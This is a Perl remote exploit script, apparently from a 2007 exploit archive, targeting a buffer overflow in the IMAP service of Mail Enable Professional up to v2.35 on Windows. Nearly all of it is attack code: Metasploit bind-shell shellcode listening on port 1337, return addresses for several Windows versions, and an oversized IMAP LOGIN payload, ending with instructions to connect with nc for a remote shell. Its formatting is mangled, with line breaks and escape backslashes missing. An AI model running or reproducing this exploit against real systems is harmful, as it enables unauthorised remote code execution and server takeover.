maildisable-v6.pl.txt
Posted on 17 February 2007
#!/usr/bin/perl # # maildisable-v6.pl # # Mail Enable Professional <=v2.35 (win32) remote exploit # by mu-b - Tue Dec 5 2006 # # - Tested on: Mail Enable Professional v2.35 (win32) # # Note: timing is quite critical with this!!, so change $send_delay # if it doesn't work.... # ######## use Getopt::Std; getopts('t:n:', \%arg); use Socket; # metasploit win32 bindshell port 1337 my $zshell_win32_bind = "x33xc9x83xe9xb0". "x81xc4xd0xfdxffxff". "xd9xeexd9x74x24xf4x5bx81x73x13x1d". "xccx32x69x83xebxfcxe2xf4xe1xa6xd9x24xf5x35xcdx96". "xe2xacxb9x05x39xe8xb9x2cx21x47x4ex6cx65xcdxddxe2". "x52xd4xb9x36x3dxcdxd9x20x96xf8xb9x68xf3xfdxf2xf0". "xb1x48xf2x1dx1ax0dxf8x64x1cx0exd9x9dx26x98x16x41". "x68x29xb9x36x39xcdxd9x0fx96xc0x79xe2x42xd0x33x82". "x1exe0xb9xe0x71xe8x2ex08xdexfdxe9x0dx96x8fx02xe2". "x5dxc0xb9x19x01x61xb9x29x15x92x5axe7x53xc2xdex39". "xe2x1ax54x3ax7bxa4x01x5bx75xbbx41x5bx42x98xcdxb9". "x75x07xdfx95x26x9cxcdxbfx42x45xd7x0fx9cx21x3ax6b". "x48xa6x30x96xcdxa4xebx60xe8x61x65x96xcbx9fx61x3a". "x4ex9fx71x3ax5ex9fxcdxb9x7bxa4x37x50x7bx9fxbbx88". "x88xa4x96x73x6dx0bx65x96xcbxa6x22x38x48x33xe2x01". "xb9x61x1cx80x4ax33xe4x3ax48x33xe2x01xf8x85xb4x20". "x4ax33xe4x39x49x98x67x96xcdx5fx5ax8ex64x0ax4bx3e". "xe2x1ax67x96xcdxaax58x0dx7bxa4x51x04x94x29x58x39". "x44xe5xfexe0xfaxa6x76xe0xffxfdxf2x9axb7x32x70x44". "xe3x8ex1exfax90xb6x0axc2xb6x67x5ax1bxe3x7fx24x96". "x68x88xcdxbfx46x9bx60x38x4cx9dx58x68x4cx9dx67x38". "xe2x1cx5axc4xc4xc9xfcx3axe2x1ax58x96xe2xfbxcdxb9". "x96x9bxcexeaxd9xa8xcdxbfx4fx33xe2x01xf2x02xd2x09". "x4ex33xe4x96xcdxccx32x69"; # ff e4 -> jmp %esp my @offsets = ( "xf8xfex5ax7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099 "xe2x48xe6x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0 "x06x38xe6x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061 "xd9xaex80x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802 "x62x51xebx77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300 "xefxbexadxde" # DoS ); &print_header; my $target; my $offset; if (defined($arg{'t'})) { $target = $arg{'t'} } if (defined($arg{'n'})) { $offset = $arg{'n'} } if (!(defined($target))) { &usage; } if (!(defined($offset))) { $offset = 0; } if ($offset > $#offsets) { print("only ".($#offsets+1)." targets known!! "); exit(1); } else { $offset = $offsets[$offset]; } my $imapd_port = 143; my $send_delay = 1; my $NOP = 'A'; my $START_PAD = 547; my $SHELL_PAD = 12; if (connect_host($target, $imapd_port)) { print("-> * Connected "); $buf = "A001 LOGIN {24}"; send(SOCKET, $buf." ", 0); sleep($send_delay); print("-> * Sending payload "); send(SOCKET, "AAAAAAAAAAAAAAAAA{20} ", 0); sleep($send_delay); send(SOCKET, "BBBBBBBBBBBBBBBBBB ", 0); sleep($send_delay); $buf = ($NOP x $START_PAD).# padding $offset. # EIP ($NOP x $SHELL_PAD). $zshell_win32_bind. # hellcode ($NOP x (0x3ff-$START_PAD-$SHELL_PAD-4-length($zshell_win32_bind))); send(SOCKET, $buf, 0); print("-> * Successfully sent payload! "); print("-> * nc ".$target." 1337 for shell... "); } sub print_header { print("MailEnable Pro <=v2.35 remote exploit "); print("by: <mu-b@digit-labs.org> "); } sub usage { print(qq(Usage: $0 -t <hostname> -t <hostname> : hostname to test -n <num> : return addy offset number )); exit(1); } sub connect_host { ($target, $port) = @_; $iaddr = inet_aton($target) || die("Error: $! "); $paddr = sockaddr_in($port, $iaddr) || die("Error: $! "); $proto = getprotobyname('tcp') || die("Error: $! "); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $! "); connect(SOCKET, $paddr) || die("Error: $! "); return(1338); }
